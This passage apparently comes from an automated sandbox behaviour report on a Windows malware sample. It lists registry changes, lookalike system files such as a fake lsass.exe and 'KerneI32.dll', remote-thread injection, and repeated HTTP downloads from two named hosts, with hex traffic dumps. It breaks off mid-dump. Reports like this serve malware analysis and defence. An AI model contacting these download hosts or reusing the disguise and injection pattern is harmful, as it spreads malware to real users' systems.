HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	DisableCachingOfSSLPages	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows NT\CurrentVersion\Winlogon	ParseAutoexec	1	5
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	AppData	%USERPROFILE%\Application Data	4
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Cache	%USERPROFILE%\Local Settings\Temporary Internet Files	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Cookies	%USERPROFILE%\Cookies	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	History	%USERPROFILE%\Local Settings\History	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Local Settings	%USERPROFILE%\Local Settings	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Personal	%USERPROFILE%\My Documents	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache	Signature	Client UrlCache MMF Ver 5.2	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	CacheLimit	163410	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	CachePrefix		2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	CachePrefix	Cookie:	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CacheOptions	11	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CachePath	%USERPROFILE%\Local Settings\History\History.IE5\MSHist012008051620080517	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CachePrefix	:2008051620080517:	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008051620080517	CacheRepair	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CacheLimit	1000	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CacheOptions	8	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CachePath	%USERPROFILE%\UserData	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CachePrefix	UserData	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData	CacheRepair	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CacheOptions	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CachePath	%USERPROFILE%\Local Settings\Application Data\Microsoft\Feeds Cache	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CachePrefix	feedplat:	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat	CacheRepair	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	CacheLimit	8192	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	CachePrefix	Visited:	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	AutoDetect	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\			1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	@ivt	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	file	3	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	ftp	3	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	http	3	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	https	3	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	shell	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	Flags	33	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	Flags	475	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	Flags	71	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	1A10	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	Flags	1	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	Flags	3	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings	MigrateProxy	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings	ProxyEnable	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	DefaultConnectionSettings	0x3c0000000200000001000000000000000000000000000000040000000000	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	SavedLegacySettings	0x460000006700000001000000000000000000000000000000040000000000	4
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	APPDATA	C:\Documents and Settings\user\Application Data	10
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	CLIENTNAME		10
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	HOMEDRIVE	C:	10
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	HOMEPATH	\Documents and Settings\user	10
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	HOMESHARE		10
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	LOGONSERVER	\\USER	10
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Volatile Environment	SESSIONNAME	Console	10

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\Software\Microsoft\Tracing\RASAPI32	0	Attributes Change,Value Change,Security Descriptor Change	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	0	Key Change	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	0	Key Change	1

2.b) sample.exe - File Activities

	- Files Created:

C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\mola[1].inf

C:\WINDOWS\srchasst\lsass.exe

C:\Windows\System32\KerneI32.dll

C:\Windows\System32\UrImon.dll

	- Files Read:

PIPE\ROUTER

PIPE\lsarpc

c:\autoexec.bat

	- Files Modified:

C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\mola[1].inf

C:\WINDOWS\srchasst\lsass.exe

C:\Windows\System32\KerneI32.dll

C:\Windows\System32\UrImon.dll

PIPE\ROUTER

PIPE\lsarpc

\Device\Afd\AsyncConnectHlp

\Device\Afd\Endpoint

\Device\Ip

\Device\RasAcd

\Device\Tcp

	- File System Control Communication:

File	Control Code	Times
PIPE\lsarpc	0x0011C017	38
PIPE\ROUTER	0x0011C017	3

	- Device Control Communication:

File	Control Code	Times
unnamed file	0x00390008	7
\Device\Afd\Endpoint	AFD_GET_INFO (0x0001207B)	2
\Device\Afd\Endpoint	AFD_SET_CONTEXT (0x00012047)	106
\Device\Afd\Endpoint	AFD_BIND (0x00012003)	34
\Device\Afd\Endpoint	AFD_GET_TDI_HANDLES (0x00012037)	68
\Device\Afd\Endpoint	AFD_GET_SOCK_NAME (0x0001202F)	67
\Device\Afd\Endpoint	AFD_SET_INFO (0x0001203B)	5
\Device\Afd\AsyncConnectHlp	AFD_CONNECT (0x00012007)	1
\Device\Afd\Endpoint	AFD_SELECT (0x00012024)	68
unnamed file	0x00120028	2
\Device\Afd\Endpoint	AFD_SEND (0x0001201F)	51
\Device\Afd\Endpoint	AFD_RECV (0x00012017)	58
\Device\Tcp	0x00120003	6
\Device\RasAcd	0x00F14014	33
\Device\Afd\Endpoint	AFD_CONNECT (0x00012007)	33
\Device\Afd\Endpoint	AFD_DISCONNECT (0x0001202B)	32

	- Memory Mapped Files:

File Name

C:\WINDOWS\System32\mswsock.dll

C:\WINDOWS\System32\winrnr.dll

C:\WINDOWS\System32\wshtcpip.dll

C:\WINDOWS\srchasst\lsass.exe

C:\WINDOWS\system32\Apphelp.dll

C:\WINDOWS\system32\DNSAPI.dll

C:\WINDOWS\system32\KerneI32.dll

C:\WINDOWS\system32\MSCTF.dll

C:\WINDOWS\system32\RASAPI32.dll

C:\WINDOWS\system32\TAPI32.dll

C:\WINDOWS\system32\URIMON.dll

C:\WINDOWS\system32\hnetcfg.dll

C:\WINDOWS\system32\iphlpapi.dll

C:\WINDOWS\system32\msctfime.ime

C:\WINDOWS\system32\msv1_0.dll

C:\WINDOWS\system32\olepro32.dll

C:\WINDOWS\system32\rasadhlp.dll

C:\WINDOWS\system32\rasman.dll

C:\WINDOWS\system32\rpcss.dll

C:\WINDOWS\system32\rtutils.dll

C:\WINDOWS\system32\sensapi.dll

C:\WINDOWS\system32\uxtheme.dll

C:\Windows\AppPatch\sysmain.sdb

2.c) sample.exe - Windows Service Activities

	- Services Started:

RASMAN

2.d) sample.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\WINDOWS\srchasst\lsass.exe

	- Remote Threads Created:

Affected Process

C:\WINDOWS\srchasst\lsass.exe

	- Thread Overview:

Time	Number of threads
After 82 seconds	0
After 92 seconds	1
After 153 seconds	0

	- Foreign Memory Regions Read:

Process: C:\WINDOWS\srchasst\lsass.exe

	- Foreign Memory Regions Written:

Process: C:\WINDOWS\srchasst\lsass.exe

2.e) sample.exe - Network Activity

	- DNS Queries:

Name	Query Type	Query Result	Successful	Protocol
www.turkonz.com	DNS_TYPE_A		1
www.lades77.com	DNS_TYPE_A		1

	- HTTP Conversations:

From ANUBIS:1032 to 78.111.96.8:80 - [www.turkonz.com]
Request: GET /img/jpg/mola.inf
Response: 200 "OK"
Request: GET /img/jpg/yak.txt
Response: 200 "OK"
Request: GET /img/jpg/yak.txt
Response: 200 "OK"
Request: GET /img/jpg/yis.txt
Response: 200 "OK"
Request: GET /img/jpg/yis.txt
Response: 200 "OK"
Request: GET /img/jpg/yvak.txt
Response: 200 "OK"
Request: GET /img/jpg/yvak.txt
Response: 200 "OK"
Request: GET /img/jpg/yzir.txt
Response: 200 "OK"
Request: GET /img/jpg/yzir.txt
Response: 200 "OK"
Request: GET /img/jpg/yt.txt
Response: 200 "OK"
Request: GET /img/jpg/yt.txt
Response: 200 "OK"
Request: GET /img/jpg/yexi.txt
Response: 200 "OK"
Request: GET /img/jpg/yexi.txt
Response: 200 "OK"
Request: GET /img/jpg/yalb.txt
Response: 200 "OK"
Request: GET /img/jpg/yalb.txt
Response: 200 "OK"
Request: GET /img/jpg/ytuf.txt
Response: 200 "OK"
Request: GET /img/jpg/ytuf.txt
Response: 200 "OK"
Request: GET /img/jpg/ykuv.txt
Response: 200 "OK"
Request: GET /img/jpg/ykuv.txt
Response: 200 "OK"
Request: GET /img/jpg/ycit.txt
Response: 200 "OK"
Request: GET /img/jpg/ycit.txt
Response: 200 "OK"
Request: GET /img/jpg/yana.txt
Response: 200 "OK"
Request: GET /img/jpg/yana.txt
Response: 200 "OK"
Request: GET /img/jpg/yturkish.txt
Response: 200 "OK"
Request: GET /img/jpg/yturkish.txt
Response: 200 "OK"
Request: GET /img/jpg/yasy.txt
Response: 200 "OK"
Request: GET /img/jpg/yasy.txt
Response: 200 "OK"
Request: GET /img/jpg/yden.txt
Response: 200 "OK"
Request: GET /img/jpg/yden.txt
Response: 200 "OK"
Request: GET /img/jpg/ybet.txt
Response: 200 "OK"
Request: GET /img/jpg/ybet.txt
Response: 200 "OK"
Request: GET /img/jpg/yeur.txt
Response: 200 "OK"
Request: GET /img/jpg/yeur.txt
Response: 200 "OK"
Request: GET /img/jpg/yfin.txt
Response: 200 "OK"
Request: GET /img/jpg/yfin.txt
Response: 200 "OK"
Request: GET /img/jpg/yfor.txt
Response: 200 "OK"
Request: GET /img/jpg/yfor.txt
Response: 200 "OK"
Request: GET /img/jpg/yyap.txt
Response: 200 "OK"
Request: GET /img/jpg/yyap.txt
Response: 200 "OK"
Request: GET /img/jpg/ysup.txt
Response: 200 "OK"
Request: GET /img/jpg/ysup.txt
Response: 200 "OK"
Request: GET /img/jpg/yhsb.txt
Response: 200 "OK"
Request: GET /img/jpg/yhsb.txt
Response: 200 "OK"
Request: GET /img/jpg/ying.txt
Response: 200 "OK"
Request: GET /img/jpg/ying.txt
Response: 200 "OK"
Request: GET /img/jpg/yhal.txt
Response: 200 "OK"
Request: GET /img/jpg/yhal.txt
Response: 200 "OK"
Request: GET /img/jpg/ygar.txt
Response: 200 "OK"
Request: GET /img/jpg/ygar.txt
Response: 200 "OK"
Request: GET /img/jpg/ycher.txt
Response: 200 "OK"
Request: GET /img/jpg/ycher.txt
Response: 200 "OK"
Request: GET /img/jpg/ysek.txt
Response: 200 "OK"
Request: GET /img/jpg/ysek.txt
Response: 200 "OK"
Request: GET /img/jpg/ytek.txt
Response: 200 "OK"
Request: GET /img/jpg/ytek.txt
Response: 200 "OK"
Request: GET /img/jpg/yteb.txt
Response: 200 "OK"
Request: GET /img/jpg/yteb.txt
Response: 200 "OK"
Request: GET /img/jpg/ycas.txt
Response: 200 "OK"
Request: GET /img/jpg/ycas.txt
Response: 200 "OK"
Request: GET /img/jpg/ya.txt
Response: 200 "OK"
Request: GET /img/jpg/ya.txt
Response: 200 "OK"
Request: GET /img/jpg/mola.inf
Response: 304 "Not Modified"
From ANUBIS:1035 to 66.147.242.99:80 - [www.lades77.com]
Request: GET /images/js/yak.txt
Response: 200 "OK"
Request: GET /images/js/yis.txt
Response: 200 "OK"
Request: GET /images/js/yvak.txt
Response: 200 "OK"
Request: GET /images/js/yzir.txt
Response: 200 "OK"
Request: GET /images/js/yt.txt
Response: 200 "OK"
Request: GET /images/js/yexi.txt
Response: 200 "OK"
Request: GET /images/js/yalb.txt
Response: 200 "OK"
Request: GET /images/js/ytuf.txt
Response: 200 "OK"
Request: GET /images/js/ykuv.txt
Response: 200 "OK"
Request: GET /images/js/ycit.txt
Response: 200 "OK"
Request: GET /images/js/yana.txt
Response: 200 "OK"
Request: GET /images/js/yturkish.txt
Response: 200 "OK"
Request: GET /images/js/yasy.txt
Response: 200 "OK"
Request: GET /images/js/yden.txt
Response: 200 "OK"
Request: GET /images/js/ybet.txt
Response: 200 "OK"
Request: GET /images/js/yeur.txt
Response: 200 "OK"
Request: GET /images/js/yfin.txt
Response: 200 "OK"
Request: GET /images/js/yfor.txt
Response: 200 "OK"
Request: GET /images/js/yyap.txt
Response: 200 "OK"
Request: GET /images/js/ysup.txt
Response: 200 "OK"
Request: GET /images/js/yhsb.txt
Response: 200 "OK"
Request: GET /images/js/ying.txt
Response: 200 "OK"
Request: GET /images/js/yhal.txt
Response: 200 "OK"
Request: GET /images/js/ygar.txt
Response: 200 "OK"
Request: GET /images/js/ycher.txt
Response: 200 "OK"
Request: GET /images/js/ysek.txt
Response: 200 "OK"
Request: GET /images/js/ytek.txt
Response: 200 "OK"
Request: GET /images/js/yteb.txt
Response: 200 "OK"
Request: GET /images/js/ycas.txt
Response: 200 "OK"
Request: GET /images/js/ya.txt
Response: 200 "OK"

	- Unknown TCP Traffic:

from ANUBIS:1034 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 314 - Transferred inbound Bytes: 630

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 616b    GET /img/jpg/yak
2e74 7874 2048 5454 502f 312e 310d 0a43    .txt HTTP/1.1..C
6f6e 7465 6e74 2d54 7970 653a 2074 6578    ontent-Type: tex
742f 6874 6d6c 0d0a 486f 7374 3a20 7777    t/html..Host: ww
772e 7475 726b 6f6e 7a2e 636f 6d0d 0a41    w.turkonz.com..A
6363 6570 743a 2074 6578 742f 6874 6d6c    ccept: text/html
2c20 2a2f 2a0d 0a55 7365 722d 4167 656e    , */*..User-Agen
743a 204d 6f7a 696c 6c61 2f33 2e30 2028    t: Mozilla/3.0 (
636f 6d70 6174 6962 6c65 3b20 496e 6479    compatible; Indy
204c 6962 7261 7279 290d 0a0d 0a            Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 300d 0a43 6f6e 7465 6e74 2d54 7970     40..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3231 3a34 3720 474d 540d 0a41 6363    4:21:47 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3334 3738 3562    s..ETag: "34785b
3162 3132 3764 6339 313a 6164 3966 6322    1b127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a31 3020 474d 540d    09 11:01:10 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7961 6b2e 7478 74                /js/yak.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 616b    GET /img/jpg/yak
2e74 7874 2048 5454 502f 312e 310d 0a43    .txt HTTP/1.1..C
6f6e 7465 6e74 2d54 7970 653a 2074 6578    ontent-Type: tex
742f 6874 6d6c 0d0a 486f 7374 3a20 7777    t/html..Host: ww
772e 7475 726b 6f6e 7a2e 636f 6d0d 0a41    w.turkonz.com..A
6363 6570 743a 2074 6578 742f 6874 6d6c    ccept: text/html
2c20 2a2f 2a0d 0a55 7365 722d 4167 656e    , */*..User-Agen
743a 204d 6f7a 696c 6c61 2f33 2e30 2028    t: Mozilla/3.0 (
636f 6d70 6174 6962 6c65 3b20 496e 6479    compatible; Indy
204c 6962 7261 7279 290d 0a0d 0a            Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 300d 0a43 6f6e 7465 6e74 2d54 7970     40..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3231 3a34 3720 474d 540d 0a41 6363    4:21:47 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3334 3738 3562    s..ETag: "34785b
3162 3132 3764 6339 313a 6164 3966 6322    1b127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a31 3120 474d 540d    09 11:01:11 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7961 6b2e 7478 74                /js/yak.txt

from ANUBIS:1036 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 314 - Transferred inbound Bytes: 630

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6973    GET /img/jpg/yis
2e74 7874 2048 5454 502f 312e 310d 0a43    .txt HTTP/1.1..C
6f6e 7465 6e74 2d54 7970 653a 2074 6578    ontent-Type: tex
742f 6874 6d6c 0d0a 486f 7374 3a20 7777    t/html..Host: ww
772e 7475 726b 6f6e 7a2e 636f 6d0d 0a41    w.turkonz.com..A
6363 6570 743a 2074 6578 742f 6874 6d6c    ccept: text/html
2c20 2a2f 2a0d 0a55 7365 722d 4167 656e    , */*..User-Agen
743a 204d 6f7a 696c 6c61 2f33 2e30 2028    t: Mozilla/3.0 (
636f 6d70 6174 6962 6c65 3b20 496e 6479    compatible; Indy
204c 6962 7261 7279 290d 0a0d 0a            Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 300d 0a43 6f6e 7465 6e74 2d54 7970     40..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a34 3720 474d 540d 0a41 6363    4:23:47 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6663 3637 6335    s..ETag: "fc67c5
3632 3132 3764 6339 313a 6164 3966 6322    62127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a31 3320 474d 540d    09 11:01:13 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7969 732e 7478 74                /js/yis.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 6973    GET /img/jpg/yis
2e74 7874 2048 5454 502f 312e 310d 0a43    .txt HTTP/1.1..C
6f6e 7465 6e74 2d54 7970 653a 2074 6578    ontent-Type: tex
742f 6874 6d6c 0d0a 486f 7374 3a20 7777    t/html..Host: ww
772e 7475 726b 6f6e 7a2e 636f 6d0d 0a41    w.turkonz.com..A
6363 6570 743a 2074 6578 742f 6874 6d6c    ccept: text/html
2c20 2a2f 2a0d 0a55 7365 722d 4167 656e    , */*..User-Agen
743a 204d 6f7a 696c 6c61 2f33 2e30 2028    t: Mozilla/3.0 (
636f 6d70 6174 6962 6c65 3b20 496e 6479    compatible; Indy
204c 6962 7261 7279 290d 0a0d 0a            Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 300d 0a43 6f6e 7465 6e74 2d54 7970     40..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3233 3a34 3720 474d 540d 0a41 6363    4:23:47 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 6663 3637 6335    s..ETag: "fc67c5
3632 3132 3764 6339 313a 6164 3966 6322    62127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a31 3320 474d 540d    09 11:01:13 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7969 732e 7478 74                /js/yis.txt

from ANUBIS:1037 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 159 - Transferred inbound Bytes: 748

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
6973 2e74 7874 2048 5454 502f 312e 310d    is.txt HTTP/1.1.
0a43 6f6e 7465 6e74 2d54 7970 653a 2074    .Content-Type: t
6578 742f 6874 6d6c 0d0a 486f 7374 3a20    ext/html..Host: 
7777 772e 6c61 6465 7337 372e 636f 6d0d    www.lades77.com.
0a41 6363 6570 743a 2074 6578 742f 6874    .Accept: text/ht
6d6c 2c20 2a2f 2a0d 0a55 7365 722d 4167    ml, */*..User-Ag
656e 743a 204d 6f7a 696c 6c61 2f33 2e30    ent: Mozilla/3.0
2028 636f 6d70 6174 6962 6c65 3b20 496e     (compatible; In
6479 204c 6962 7261 7279 290d 0a0d 0a      dy Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3135    ar 2009 11:01:15
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
